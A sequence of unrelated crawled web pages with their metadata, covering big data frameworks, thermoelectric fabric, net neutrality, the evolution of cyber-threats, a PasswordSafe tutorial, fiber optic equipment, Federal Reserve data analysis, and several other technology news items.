In this video, we’ll discuss the basic frameworks for big data implementations.
In general, big data implementations must support three major core capabilities:
- Store – First, it must be able to store all the data. There must be software and infrastructure necessary to capture and store high volumes of data.
- Process – Next, it must also be able to process the stored data by having the compute power to organize, enrich, and analyze the data.
- Access – Lastly, a big data framework must be able to access all of your data to retrieve, search, integrate, and visualize the data when and how required.
Along with these capabilities, the architectural building blocks of big data must integrate these core capabilities into three major layers.
Infrastructure services – The foundation of every big data architecture project is the infrastructure. Innovations over the last 10 years, including infrastructure services APIs, open source configuration management software, and the wide adoption of virtualization have allowed for more efficient deployment of servers, storage, and networking.
Essentially, what used to take months from procurement to configuration to load and deployment now takes minutes. In addition, data management software – which we’ll talk about more in a second – allows projects to be reliably coordinated across multiple commodity servers.
Scaling out commodity servers rather than scaling up expensive, customized, brand-name appliances is obviously a much less expensive proposition per bit of data captured and analyzed.
When considering hosting solutions for big data deployments, multi-tenant public cloud architectures usually have performance trade-offs to reach scale. The virtual, shared, and oversubscribed aspects of multi-tenant public clouds can lead to problems with noisy neighbors resulting in degradation of performance of your big data workloads.
To alleviate such problems for your big data workloads, a good alternative is to build out a dedicated infrastructure with bare-metal server nodes, for several significant reasons. First, bare-metal servers provide fully dedicated compute resources for your big data workloads, eliminating the noisy neighbor problem of multi-tenant environments. Second, bare-metal servers can be deployed in a flexible, cloud-like model, meaning they can be provisioned and de-provisioned instantly, depending on demand. And lastly, bare-metal solutions provide fully dedicated storage, meaning that all disks are local and can be configured with SSDs to achieve higher IOPS for the horizontally scalable distributed data management services, which we will discuss next.
Data management services – This layer builds horizontally scalable distributed data management services on top of the infrastructure services layer. Three types of technologies work together to manage big data in this layer.
First, data stream processing technology enables the filtering and capturing of high velocity information streams using parallel processing. Second, a distributed file management system, such as the Hadoop distributed file system (HDFS) handles routine file operations using a flexible array of storage and processing nodes to provide fault tolerance and scalability. And lastly, NoSQL databases that trade off integrity guarantees for theoretically unlimited scalability while maintaining database flexibility.
In terms of flexibility, the NoSQL databases eliminate the rigid schema of relational databases by allowing you to adapt to evolving data capture and management needs.
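As a small illustration of that schema flexibility, here is a hypothetical sketch using plain Python dictionaries to stand in for documents in a NoSQL store. The field names are invented; the point is that later records can add fields without any schema migration.

```python
# Documents in a NoSQL-style store can evolve independently,
# unlike rows in a rigid relational table.
events = []

# Early records capture only a few fields...
events.append({"user": "alice", "action": "login"})

# ...while later records add new fields with no ALTER TABLE step.
events.append({"user": "bob", "action": "purchase",
               "items": ["widget"], "total": 19.99})

def actions(store):
    """List the 'action' field across documents of differing shape."""
    return [doc["action"] for doc in store]

if __name__ == "__main__":
    print(actions(events))  # -> ['login', 'purchase']
```

The trade-off, as noted above, is that the database no longer enforces a uniform structure, so integrity checks move into application code.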
The third layer of the architectural building blocks of big data sits on top of the data management layer and is a class of middleware that leverages the data management layer to conduct query, analysis, and some transactional processing. Examples include Pig, a data flow language, and Hive, a data warehouse framework, both part of the Hadoop ecosystem.
In our next and final big data video, Brian Bulkowski at Aerospike will introduce how various data management and processing tools are used in a NoSQL big data deployment.
Watch next: Aerospike discusses NoSQL for Big Data | <urn:uuid:964838cd-32fd-4b7c-b85c-e44abc5b113c> | CC-MAIN-2017-04 | http://www.internap.com/resources/video-big-data-important/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560282926.64/warc/CC-MAIN-20170116095122-00522-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.883884 | 806 | 2.546875 | 3 |
Researchers at Wake Forest University are using cutting-edge carbon nanotube designs to turn active, mobile, non-coma-dreaming humans into the heat source that will generate power for their cell phones.
If you'll remember, that was the central assumption of The Matrix (it was central to the plot, but tertiary in the concept behind the movie, right behind "We can make Keanu look cool with CGI" and "Lots of fanboys will pay to watch Carrie-Anne Moss in skintight vinyl").
Their research, which appears in the current issue of Nano Letters, led to the development of a material called Power Felt, made of carbon nanotubes wrapped in plastic fibers designed to feel like fabric.
It creates a charge by exploiting differences in temperature between segments of the wearer's body, or between the body and cooler air around it.
Humans "waste a lot of energy as heat," according to Wake Forest graduate student Corey Hewitt, who helped research and write a paper on the power-generating results of the thermoelectric effect.
Most thermoelectric power-generating devices use bismuth telluride, which is much more efficient than carbon nanotubes but can cost as much as $1,000 per kilogram. Power Felt, by comparison, could add as little as $1 to the cost of a smartphone case.
The nanotube fabric used by the team stacks 72 layers of fabric to generate 140 nanowatts of power.
Other potential applications include wrapping it around a flashlight or other small device to provide power during blackouts, or putting it in a coat to power personal electronics using the differing heat levels inside the coat and the cold outside, according to David Carroll, director of the Center for Nanotechnology and Molecular Materials.
Real, practical use is still some time off, though. Hewitt goes along with the use cases described by Carroll, but says the ability to power even something as small as an iPod is still some time off, though it is "definitely within reach."
Read more of Kevin Fogarty's CoreIT blog and follow the latest IT news at ITworld.
Since the DC Circuit Court struck down the 2010 Open Internet Order in January, we’ve seen thousands of stories and columns written about net neutrality and the future of the Internet. The significant coverage underscores the important debate and upcoming decision by the FCC to craft rules that provide important consumer protections while not stifling investment, innovation and the freedom to create.
In recent weeks, we’ve seen several columns that share our concern that calls for overregulation of the Internet are extreme and unnecessary. These columns have also asked what would happen if the Internet, the world’s most advanced communications technology, were suddenly burdened with heavy new rules.
Here are a few that we wanted to share:
A Taxi Commission for the Internet, The Wall Street Journal, L. Gordon Crovitz
The clash between Uber, Lyft and taxicab regulators is a bitter reminder that regulators, even with the best intentions, can hinder innovation. Industries experiencing rapid technological change, like broadband networks, should be freed to innovate at the pace of technology – not the pace of government.
Internet Policy Shouldn’t Pit Service Providers Against Content Providers, The Washington Post, Ev Ehrlich
Ev Ehrlich says: “The industry’s critics need to rethink the white vs. black hat sophistry. Or, even better – let’s make Internet policy without any hats at all.”
How the FCC Can Save Net Neutrality and Still Ruin the Internet, The Huffington Post, Mike Montgomery
The Communications Act of 1934 gave us Title II regulations. Laws that old can’t possibly meet the needs of “today’s sprawling, bustling, magically fragmented Internet, a miracle of technology.” Even 1996, when the Act was updated, isn’t modern enough for this technology.
The Internet is Not a Water Pipe, The Huffington Post, Jason A. Llorenz
As the post says, the Internet “requires policy makers to think past the water pipe,” and other basic utilities. Over the last 20 years, the evolution and progress of the Internet are due to private investment and modern public policy. Let’s keep it that way.
Fast Lanes Saved the Internet, The Wall Street Journal, L. Gordon Crovitz
Modern broadband networks have benefited enormously from the performance and efficiency of flexible networks. They help facilitate Internet traffic during peak times. Reclassifying the Internet as a public utility would spell the end of permissionless innovation on the Internet. Putting bureaucrats in charge of the Internet would undermine the world’s greatest engine of innovation. | <urn:uuid:980ea38c-6e85-4c88-850a-d30629ed2967> | CC-MAIN-2017-04 | https://www.ncta.com/platform/public-policy/the-growing-concern-over-title-ii/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560285001.96/warc/CC-MAIN-20170116095125-00430-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.903761 | 534 | 2.578125 | 3 |
Fighting Cyber-Threats in the 21st Century
By CIOinsight | Posted 09-06-2011
In the 10 years since hijackers flew two passenger jets into the World Trade Center in New York City and a third one into the Pentagon, federal, state and local governments have struggled to secure transportation systems and physical infrastructure of all kinds from terrorist attacks.
However, the damage was done. The attacks ended -- probably forever -- Americans' carefree belief that we were immune from the terrorist attacks that had plagued the Middle East, Europe and the Asia-Pacific regions for years.
Since then, Americans, along with technology-savvy people around the world, have had to deal with another source of unease: a growing sense of insecurity about whether the computer systems people and institutions rely on are safe from theft, corruption and destruction by advanced cyber-threats.
In 2001, the closest thing we had to social media was SixDegrees.com, and cyber-threats mostly involved stalling Website operations, compromising PC performance or occasionally destroying database files.
However, in the past 10 years, cyber-threats have evolved into sophisticated attacks that can cripple large enterprises, steal credit card numbers and personal identities, empty bank accounts, and probe the labyrinthine depths of enterprise and government networks before draining databases full of sensitive documents or trade secrets.
Ten years ago, viruses were still primarily the work of amateurs, as online organized crime gangs didn't yet exist, said Mikko Hypponen, chief research officer at F-Secure. "People weren't writing keyloggers and viruses to make money," he added.
The most common way of getting infected was via a malicious executable file attached to an email message. That kind of attack would no longer work, as those emails would now be blocked, or "killed," by even the most basic spam filters.
It was easy to tell when a user was infected back then, as malware would produce an effect, such as crashing the computer. Now, highly sophisticated malware lurks silently on infected systems and harvests data. It's nearly impossible to tell if a user has been infected, since attackers don't want to be detected and lose their source of income, Hypponen said.
The attackers have changed post-9/11, as cyber-threats now come from criminals intent on stealing money, extremists out to make a point and nation-states engaged in espionage, to name just a few.
Shortly after the United States Navy SEAL operation successfully killed Osama bin Laden in his compound in Pakistan, there was an increase in probing attacks on defense systems trying to access information about the operation, Charles Dodd, a government consultant for cyber-defense, told eWEEK. Intruders were after highly classified information on who the United States talked to and worked with, as well as the information collected, he said.
Criminals are increasingly relying on the latest technology to plan and execute attacks on the Internet, including the use of social networking to push out scams, and they are focusing on developing mobile malware. In fact, Canadian and United States law enforcement organizations have complained about criminals relying on BlackBerry's encrypted communications to hide their activities.
To read the original eWEEK article, see: Fighting 21st Century Cyber-Threats
Data normalization reconsidered, Part 2, Business records in the 21st century
An examination of record keeping in computer systems
From the developerWorks archives
Date archived: January 13, 2017 | First published: January 12, 2012

Relational databases have been fundamental to business systems for more than 25 years. Data normalization is a methodology that minimizes data duplication to safeguard databases against logical and structural problems, such as data anomalies. Relational database normalization continues to be taught in universities and practiced widely. Normalization was devised in the 1970s, when the assumptions about computer systems were different from what they are today.
The first part of this 2-part series provided a historical review of record keeping and examined the problems associated with data normalization, such as the difficulty of mapping evolving business records to a normalized format. Since the Internet has led to the widespread creation of business records in digital formats such as XML, it has become possible to store records in computer systems in their original format.
The second part of the series discusses alternative data representations like XML, JSON, and RDF to overcome normalization issues or to introduce schema flexibility. In the 21st century digitized business records are often created in XML to begin with. This paper compares XML to normalized relational structures and explains when and why XML enables easier and faster data access. After a discussion of JSON and RDF it concludes with a summary and suggestions for reconsidering normalization.
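To make the comparison concrete, here is a small, hypothetical sketch of one business record (a purchase order) in both shapes: split into normalized relational rows that must be rejoined, versus kept whole as a single document. The table and field names are invented for illustration.

```python
import json

# Normalized form: the record is split across tables
# and must be reassembled by joins at read time.
orders = {1: {"customer_id": 7}}
order_lines = [
    {"order_id": 1, "sku": "A100", "qty": 2},
    {"order_id": 1, "sku": "B205", "qty": 1},
]

def reassemble(order_id):
    """Join the normalized rows back into one whole record."""
    return {
        "order": order_id,
        "customer_id": orders[order_id]["customer_id"],
        "lines": [l for l in order_lines if l["order_id"] == order_id],
    }

# Document form: the same record kept whole, in its original shape,
# as a single JSON (or XML) document -- no join needed to read it.
document = json.dumps(reassemble(1))

if __name__ == "__main__":
    print(document)
```

The document form trades some update discipline for reads that match the shape of the original business record, which is the trade-off the series examines.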
This content is no longer being updated or maintained. The full article is provided "as is" in a PDF file. Given the rapid evolution of technology, some steps and illustrations may have changed. | <urn:uuid:310d681c-da7c-4fa1-86a6-01607c681c0d> | CC-MAIN-2017-04 | http://www.ibm.com/developerworks/data/library/techarticle/dm-1201normalizationpart2/index.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280483.83/warc/CC-MAIN-20170116095120-00423-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.945455 | 330 | 2.8125 | 3 |
1. Fiber Coupler
A fiber optic coupler, also called a fiber optic adapter, is used for connecting and coupling optical fiber connectors; the model is selected to match the connector type. By joint structure, couplers are available in FC, SC, ST, LC, MTRJ, MPO, MU, SMA, DDI, DIN4, D4 and E2000 forms, with good sintering technology to ensure excellent strength and stability (200–600 gf insertion force).
Applications Of Fiber Optic Coupler
Fiber communication network
Broadband access network
2. Fiber Termination Box
A cable termination box, also known as an optical fiber termination box, is a connection device between multi-core cables and terminal equipment. It is mainly used to fix the cable end, store and protect the remaining fibers, and house the splices between fiber optic cables and fiber pigtails.
3. Fusion Splicer
A fusion splicer joins the fibers inside two optical fiber cables. Because optical fiber is essentially glass, the two prepared ends must be melted (fused) together at the joint so that the light signal can pass from one fiber to the other.
Light transmitted in fiber incurs loss, composed mainly of the transmission loss of the fiber itself and the splice loss at fiber joints. Once the optical cable has been ordered, the fiber's own transmission loss is essentially fixed, while splice loss is determined by the fiber and by on-site workmanship. Reducing splice loss at fiber joints increases the achievable distance between optical amplifiers and improves the attenuation margin of the fiber link.
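As a rough illustration of why splice loss matters to the link budget, here is a simple attenuation sketch. The loss figures are assumed, typical-order values for illustration, not specifications.

```python
def link_loss_db(km, fiber_db_per_km, splices, splice_db):
    """Total attenuation: fiber loss plus the sum of all splice losses."""
    return km * fiber_db_per_km + splices * splice_db

if __name__ == "__main__":
    # 40 km of fiber at an assumed 0.35 dB/km, with 10 splices:
    print(link_loss_db(40, 0.35, 10, 0.10))  # well-made splices, 0.10 dB each
    print(link_loss_db(40, 0.35, 10, 0.30))  # poor splices, 0.30 dB each
```

With those assumed figures, poor splicing alone adds about 2 dB of extra loss over the link, loss that comes directly out of the link's attenuation margin.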
4. Fiber Media Converter
A fiber optic media converter is an Ethernet transmission-media conversion unit that interchanges short-distance twisted-pair electrical signals and long-distance optical signals.
Fiber media converters are generally used in network environments that Ethernet cable cannot cover, where optical fiber must be used to extend the transmission distance. They are typically deployed at the access layer of metropolitan area networks, and they also play a large role in the "last kilometer," connecting fiber to the metro network and to more outer-layer networks.
5. Fiber Optic Multiplexer
A fiber optic multiplexer is a fiber communication device used to extend data transmission. Through signal modulation and photoelectric conversion, it exploits the transmission characteristics of optical fiber to achieve long-distance transmission. Optical multiplexers are generally used in pairs, divided into an optical transmitter and an optical receiver. The transmitter performs the electrical-to-optical conversion and sends the optical signal over the fiber; the receiver converts the optical signal from the fiber back into an electrical signal, completing the optical-to-electrical conversion. Optical multiplexers are used for remote data transmission.
Optical multiplexers come in many types, such as telephone, video, video/audio, video/data and video/audio/data multiplexers. The most commonly used is the video multiplexer, which is especially widespread in the security industry.
An optical multiplexer is terminal equipment for optical signal transmission. In principle it is photoelectric conversion equipment placed at both ends of the optical cable: one transmitter and one receiver, as the name implies. Transmitters and receivers are therefore used in pairs, so optical multiplexers are usually bought in pairs rather than individually.
Everyone is aware that selecting passwords wisely and safeguarding them should be an important priority, yet most people need to remember so many passwords that it’s nearly impossible to do so. Because of the need to recall dozens of passwords and keep up with their rotation, many people are forced to use insecure shortcuts, such as storing passwords in an unencrypted file or reusing the same password on many systems. PasswordSafe is one solution to the problem.
PasswordSafe is intended to be a secure solution for maintaining a list of passwords. It uses a secure, encrypted database to store each password, which can only be accessed by providing the master password. Originally developed by Bruce Schneier’s Counterpane Labs, it is now developed and administered by Jim Russell and Rony Shapiro as a SourceForge project. PasswordSafe can be downloaded here.
How is PasswordSafe more secure than storing passwords in a text file or database? All passwords within the database (called a safe) are encrypted using the Blowfish algorithm, also designed by Bruce Schneier, which has so far resisted practical cryptanalysis. Provided a secure master password, referred to as the combination, has been chosen for the safe, no one should be able to decrypt the passwords stored within the safe, even if they obtain a copy of the file. For this reason, it is imperative to choose a strong master password. For guidance in selecting the master password, refer to Eric Wolfram’s “How to Pick a Safe Password”. Take care never to lose or forget the combination (master password) for any safe. PasswordSafe intentionally has no way to recover a lost combination, because doing so would compromise its security.
Getting started with PasswordSafe
First, download and install the latest version of PasswordSafe, which is available for all Windows platforms, including WinCE. For Linux users, there is a forked version (from the old 1.x series) called MyPasswordSafe, but its use is beyond the scope of this article.
The first time PasswordSafe is started, the following dialog appears:
Select “Create new database” and a prompt for the master password appears.
Weak passwords are discouraged with the following prompt.
If this prompt appears, a different master password should be created.
The newly created safe looks like this:
To create a new entry choose “Add Entry” from the Edit menu.
The password above has been created using the Random Password generator button on the right.
A prompt will appear asking if the default username should be the one supplied for the first entry.
Once the entry has been created it will show up in the safe.
Now would be a good time to save the database by choosing “Save As” from the File menu. Once the file has been saved, the title bar will show the filename.
Using PasswordSafe is just as easy as it was to enter the sample password. To use the entry, right-click on it and choose “Copy Username to Clipboard”.
After pasting the username into the website, you can double-click on the entry to speed-copy the password to the Windows clipboard. Paste the password into the website and log in as usual.
After a period of inactivity, PasswordSafe will require re-entry of the safe’s combination.
As more and more passwords are added to password safe, it becomes desirable to switch to “Nested Tree View” from the View menu. This changes the default display to the following:
Entries are grouped into trees according to each entry’s “group” field.
Changing Passwords with PasswordSafe
To change the password for a given entry, right-click on the entry and choose “Edit/View Entry”. The entry will then become available.
Click on “Show Password” and then “Generate” to generate a new password.
Once the password has been changed within PasswordSafe, don’t forget to update the password for the actual website or system as well!
There are a few other more advanced features of PasswordSafe that haven’t been covered here, but they are adequately discussed in PasswordSafe’s help file. This introduction covers enough of the basics to get started using it for password management. Here’s to never again forgetting a password!
Digging Deeper | By Mel Duvall | Posted 2005-04-06
How does Federal Reserve chairman Alan Greenspan decide to raise rates a quarter point? By analyzing a potent mixture of raw financial data and computerized economic intelligence against first-hand reports from key hubs of U.S. financial activity.
Previous Fed chairmen, such as Greenspan's predecessor, Paul Volcker, had been primarily interested in aggregated metrics like the Consumer Price Index. That is a monthly measure of the change in prices urban shoppers pay for a fixed set of goods and services, including department store products and apartment rents.
But Greenspan thinks differently. When he arrived, economists started getting more requests from the chairman's office for disaggregated data: individual points of information like the price of hot-rolled steel, construction-grade plywood or circuit boards.
Greenspan uses such data points to seek out telling shifts in the U.S. economy that large aggregated figures like the GDP sometimes disguise. A significant drop in demand for steel, for example, might not be noticed because it could be masked by increases in demand for non-steel-based products like furniture, clothing and shoes. But a dip in steel consumption may indicate that manufacturers of cars, dishwashers, microwaves and freezers are girding for a drop in demand for their products.
Wal-Mart does something similar, drilling down to compare, for example, sales of lightweight spin-casting fishing rods to determine subtle shifts in consumer tastes, perhaps brought on by a Hollywood movie such as A River Runs Through It, about fly-fishing in Montana. That might be invisible looking only at total sales of fishing rods.
For Greenspan, the summer of 1996 was spent studying U.S. productivity data. He was perplexed by figures showing a steady drop in productivity, or the output per hour of a worker.
The data didn't make sense next to his anecdotal evidence. His staff's ground reports and his own industry contacts indicated that new technology was helping companies dramatically boost productivity.
Greenspan had the Fed's economists conduct a massive research project, calculating the change in productivity in every major sector, from manufacturing to mining, finance, agriculture, education, health care and services. They found a number of flaws in how productivity was measured, particularly in service businesses such as insurance, law and banking, where technology had made a tremendous impact.
Automated teller machines, for example, let banks serve more customers faster. But because the main service they offered, money withdrawals, was largely provided for free, the benefits were not being recognized. The traditional productivity statistic measures the amount of output in dollars that comes from an hour of labor. Because there was no output or income generated by these machines, there was no recognition of the increase in productivity banks achieved.
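The measurement gap can be made concrete with some purely hypothetical numbers (none of these figures come from the article):

```python
# Hypothetical figures, for illustration only.
fee_income_dollars = 1_000_000   # measurable dollar output for the period
labor_hours = 50_000

# The traditional statistic: dollar output per hour of labor.
measured_productivity = fee_income_dollars / labor_hours

# ATMs double the number of withdrawals handled per hour, but because the
# service is free, dollar output is unchanged, and so is the statistic.
withdrawals_per_hour_before = 4
withdrawals_per_hour_after = 8

print(measured_productivity)  # still 20.0, despite a real doubling of service
```

The real gain in service delivered per hour is invisible because it never shows up as priced output, which is exactly the flaw the Fed's research identified.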
The research led Greenspan to conclude that productivity gains in the service industries were at least as high as, and probably higher than, the 3.6% average annual gains recorded in the manufacturing sector between 1994 and 1997, even though the data did not show it. That compared to average gains of 1% to 1.5% in the previous two decades.
As a result, Greenspan decided not to raise interest rates, even though many of his colleagues pressed for increases. Based on history, they feared, inflation would jump if interest rates did not slow down the economy. Instead, Greenspan theorized that gains in productivity would prevent prices from rising, an informed hunch that the data would later prove correct.
"I was on the opposite side of the chairman in that debate," Meyer says. "But he was right. He deserves the credit for figuring it out."
Greenspan goes through a similar process of checking incoming data against insights gathered from the field before each Federal Open Market Committee meeting.
In the weeks leading up to the Feb. 1 gathering, economists with the San Francisco Federal Reserve Bank placed a number of calls to executives with the Long Beach and Los Angeles ports and at local shipping companies.
The ports, which combined are the nation's busiest, had been plagued by delays in the months leading up to Christmas. The concern for Greenspan was whether those delays would have trickle-down effects. Manufacturers might be waiting on parts and retailers might not be able to restock shelves, which might in turn mean consumers would hold off opening their wallets until those big-screen TVs arrived in stores.
The ports went through their own version of the perfect storm: A surge of new production from China of everything from toys to consumer electronics, and parts for larger products like computers, had the ports working at full capacity in the summer months. Then, heading into the fall, a sharp increase of imports from retailers like Wal-Mart and Target, whose fine-tuned supply chains have stores receiving merchandise just in time to be placed on shelves for Christmas, pushed the infrastructure and workforce past their limits.
Normally a ship arrives at a scheduled time, pulls into an open dock and is unloaded in three to four days. In late October, ships were often waiting more than six days to dock, then taking more than 10 days to unload because of a shortage of longshoremen, cranes and trains.
At its worst, as many as 86 ships were lined up offshore to be unloaded at the two ports. The result was a seaside traffic jam. "It was unbelievable," says David Arian, president of Local 13 of the International Longshore and Warehouse Union. "There was an armada of ships out in the harbor waiting to be unloaded."
Not only were the ports overwhelmed, the rail lines couldn't move containers from the ships fast enough. Union Pacific was left understaffed when an unexpectedly large number of employees accepted an early retirement plan.
Months might pass before the effects of this type of logjam would show up in national statistics like the GDP, retail sales or inventory figures. But near-real-time anecdotal reports from economists with the San Francisco reserve bank kept Greenspan informed.
"What we look for is major developments in our regions that may have national implications," says Fred Furlong, vice president of financial and regional research for the San Francisco Fed, whose region encompasses California, Arizona, Nevada, Utah, Oregon, Washington, Idaho, Hawaii and Alaska.
"Our position [as an arm of Greenspan] provides us with access to a large number of people on the ground with first-hand access to what's going on with the economy," he adds.
Prior to each open market committee meeting, San Francisco economists make close to 100 calls to key contacts, such as chief executives, finance officers and controllers with major employers in the region, such as Boeing, Intel, Union Pacific and the ports. Other reserve banks do the same.
Similarly, Wal-Mart's employee-led program to collect eyewitness intelligence on rivals' sales helped clinch its decision to slash prices before Christmas.
What Furlong's team found right before the February meeting was that the worst was over. Two thousand full-time and 7,000 part-time longshoremen had signed on to help the existing 5,000. Union Pacific had hired 4,000 workers, eliminating most of its staffing bottlenecks.
The message San Francisco Fed president Yellen delivered to Greenspan was that port delays were no longer an immediate threat to the economy.
Black Box Explains...Media converters that are really switches
A media converter is a device that converts from one media type to another, for instance, from twisted pair to fiber to take advantage of fiber’s greater range. A traditional media converter is a two-port Layer 1 device that performs a simple conversion of only the physical interface. It’s transparent to data and doesn't “see” or manipulate data in any way.
An Ethernet switch can also convert one media type to another, but it also creates a separate collision domain for each switch port, so that each packet is routed only to the destination device, rather than around to multiple devices on a network segment. Because switches are “smarter” than traditional media converters, they enable additional features such as multiple ports and copper ports that autosense for speed and duplex.
Switches are beginning to replace traditional 2-port media converters, leading to some fuzziness in terminology. Small 4- or 6-port Ethernet switches are very commonly called media converters. In fact, anytime you see a “Layer 2” media converter or a media converter with more than two ports, it’s really a small Ethernet switch.
Photo: Rensselaer Polytechnic Institute seniors Erik Kauntz, Jake Pyzza, and Ryan Clapp designed and built an early prototype of a new "smart" fire suppression system.
Between 35 and 40 million fire sprinklers are now installed each year in the United States, more than in any other country in the world, according to Russell Fleming, executive vice president of the National Fire Sprinkler Association.
"The traditional use of fire sprinkler systems in the United States, as in other parts of the world, was for property protection and the resulting insurance savings," says Fleming. "However, it was found that sprinkler systems provided a life safety benefit as well. By the 1940s it began to be apparent that fires with large losses of life were taking place only in buildings without sprinkler protection."
Building codes in most jurisdictions now mandate fire sprinkler systems for certain classifications of buildings. That's the good news. However, such systems are not perfect. Indiscriminately soaking an office building, home, or workplace with water can cause tens of thousands of dollars' worth of damage in places where there was no immediate threat from fire.
A group of graduating engineers from Rensselaer Polytechnic Institute set their sights on this problem, and have developed a promising solution. Seniors Jake Pyzza, Erik Kauntz, and Ryan Clapp researched, designed, and built an early prototype of a new "smart" fire suppression system that pinpoints the location of a fire in a building and douses the blaze with flame suppressants.
"Our sensors sweep a room, sense where the fire is, and then deliver a suppressant to just that area, while the sensor is still sweeping the rest of the room to see if the fire spread," says Pyzza. "If it continues to scan and doesn't see any more sources of fire, it turns the suppression system off to help minimize any damage to the room's contents."
The group developed and built their invention last year as their final project for a year-long capstone mechanical engineering course.
The new fire detection and suppression system is hardwired with a battery backup so it can function even if the building's electricity is shut off or unavailable. And the team is now investigating methods for directly transmitting the pinpointed location - down to the specific room - of the fire to the local fire department and/or private home security companies. The system's combination of ultraviolet and infrared sensors can locate and track a lit match up to 25 feet away, according to the group.
"It's a robust system, and we basically built it from the ground up," says Kauntz. "Combined, it took us hundreds of hours to design and put together."
The group's original idea was to develop a "firefighting grenade" that fire safety officials could throw into a blaze, which gradually evolved into a home fire suppression system. The second idea stuck, particularly because municipalities are increasingly requiring new homes and home additions to have dedicated sprinkler systems.
"We felt there was a resounding need for an update to home sprinkler systems," said Clapp, a Product Design and Innovation (PDI) major from Cairo, N.Y. "The original home sprinkler system was invented in 1873 by an RPI alumnus, and it hasn't really changed since then. So we felt it was time for an update, and that this was the perfect place to do it."
The students are currently investigating the possibility of licensing the system, securing a richer set of performance data, and potentially starting the formal process of filing a patent.
SANTA BARBARA, CA--(Marketwired - Feb 11, 2014) - HyperSolar, Inc. (OTCQB: HYSR), the developer of a breakthrough technology to produce renewable hydrogen using sunlight and any source of water, today announced that its artificial photosynthesis technology is now capable of producing 1.2 volt open circuit voltage for use in direct solar hydrogen production. This achievement represents another 10% increase over the previous 1.1 volt reached late last year, a significant step towards truly renewable low cost hydrogen.
"We now see a path to production of hydrogen through immersion of low cost semiconductor materials in water," stated Tim Young. "Our approach uses only one type of inexpensive semiconducting material and reduces manufacturing complexity. The use of low-cost materials in an industrially scalable process may even make this a viable approach for fabricating low-cost photovoltaic modules for applications beyond water splitting."
"With the recent announcements of Hyundai, Honda, Toyota and other major auto manufacturers to begin shipping hydrogen fuel cell cars next year, there will be increased demand in the near future for clean hydrogen," continued Mr. Young. "We believe our technology can address two serious drawbacks impeding major adoption of hydrogen automobiles: First, the lack of hydrogen production infrastructure near the point of distribution or the fueling stations is addressed by our solar hydrogen production process. Second, hydrogen is currently produced from a fossil fuel -- natural gas -- in a process that releases substantial amounts of carbon dioxide into the atmosphere."
It is well known that the theoretical voltage for splitting water into hydrogen and oxygen is 1.23 volts, and approximately 1.5 volts in real-world systems. Achieving 1.5 volts using inexpensive solar cells has eluded the world. For example, silicon solar cells are the most inexpensive and abundant, but their 0.7 volt open circuit voltage is not enough to split water. Commercially available high voltage solar cells are considered to be far too expensive for use in hydrogen production.
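The voltage gap described above can be put in simple arithmetic terms. The voltages below are taken from the passage; the series-stacking framing is my own, purely to illustrate why a single inexpensive junction is not enough.

```python
import math

THEORETICAL_V = 1.23   # minimum voltage needed to split water
PRACTICAL_V = 1.5      # approximate requirement in real-world systems
SILICON_V = 0.7        # open-circuit voltage of one silicon solar cell

# Voltages add for cells wired in series, so the smallest stack that
# clears the practical threshold is:
cells_needed = math.ceil(PRACTICAL_V / SILICON_V)
print(cells_needed)  # 3
```

This simple count ignores losses under load, which is why real systems need the roughly 1.5 V margin over the theoretical 1.23 V in the first place.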
HyperSolar's research is centered on developing a low-cost and submersible hydrogen production particle that can split water molecules under the sun, emulating the core functions of photosynthesis. Each particle is a complete hydrogen generator that contains a novel high voltage solar cell bonded to chemical catalysts by a proprietary encapsulation coating. A video of an early proof-of-concept prototype can be viewed at http://hypersolar.com/application.php.
About HyperSolar, Inc.
HyperSolar is developing a breakthrough, low cost technology to make renewable hydrogen using sunlight and any source of water, including seawater and wastewater. Unlike hydrocarbon fuels, such as oil, coal and natural gas, where carbon dioxide and other contaminants are released into the atmosphere when used, hydrogen fuel usage produces pure water as the only byproduct. By optimizing the science of water electrolysis at the nano-level, our low cost nanoparticles mimic photosynthesis to efficiently use sunlight to separate hydrogen from water, to produce environmentally friendly renewable hydrogen. Using our low cost method to produce renewable hydrogen, we intend to enable a world of distributed hydrogen production for renewable electricity and hydrogen fuel cell vehicles. To learn more about HyperSolar, please visit our website at http://www.HyperSolar.com.
Safe Harbor Statement
Matters discussed in this press release contain forward-looking statements within the meaning of the Private Securities Litigation Reform Act of 1995. When used in this press release, the words "anticipate," "believe," "estimate," "may," "intend," "expect" and similar expressions identify such forward-looking statements. Actual results, performance or achievements could differ materially from those contemplated, expressed or implied by the forward-looking statements contained herein, and while expected, there is no guarantee that we will attain the aforementioned anticipated developmental milestones. These forward-looking statements are based largely on the expectations of the Company and are subject to a number of risks and uncertainties. These include, but are not limited to, risks and uncertainties associated with: the impact of economic, competitive and other factors affecting the Company and its operations, markets, product, and distributor performance, the impact on the national and local economies resulting from terrorist actions, and U.S. actions subsequently; and other factors detailed in reports filed by the Company.
The Dutch National Police is aware that the use of drones – and the number of drones incidents – is only going to increase as time goes by. So, they are trying to find ways to take them down without endangering people.
As Mark Wiebe, the innovation manager of the National Police Unit noted, there are situations in which drones are not allowed to fly. For example, if a drone blocks an air ambulance from landing, there has to be an effective and safe way for the police to remove the drone.
The police are looking into electronic solutions to intercept or jam the communication between a hostile drone and its operator so that they can take control of the drone themselves, and into using drones with nets to “capture” the hostile drone, but they are also testing whether eagles could do the job better.
So they have contacted Guard From Above, a Dutch company specialized in training different kinds of birds of prey to intercept hostile drones of varying types and sizes.
“The animal instinct of a bird of prey is unique. They are made to be able to overpower fast-moving prey,” the company explains.
But they are mindful of the fact that the birds could get hurt by the drones.
“In nature, birds of prey often overpower large and dangerous prey. Their talons have scales, which protect them, naturally, from their victims’ bites. Of course, we are continuously investigating any extra possible protective measures we can take in order to protect our birds,” they added.
“The Dutch National Police has asked the Dutch Organization for Applied Scientific Research (TNO) to research the possible impact on the birds’ claws. The results are not yet known. We are working closely with the Dutch National Police on the development of our services.”
Here is a demonstration of the birds at work:
A balanced relationship must exist between governments that require personal information from citizens entering their country and citizens who are willing to give up this information. The ePassport is a security model designed to maintain this balance: it authenticates citizens through a secure trust infrastructure while providing advanced privacy controls. The ePassport model is designed and intended to help nations thwart illegal border crossings by terrorists, organized crime and individuals looking to perform illicit activities.
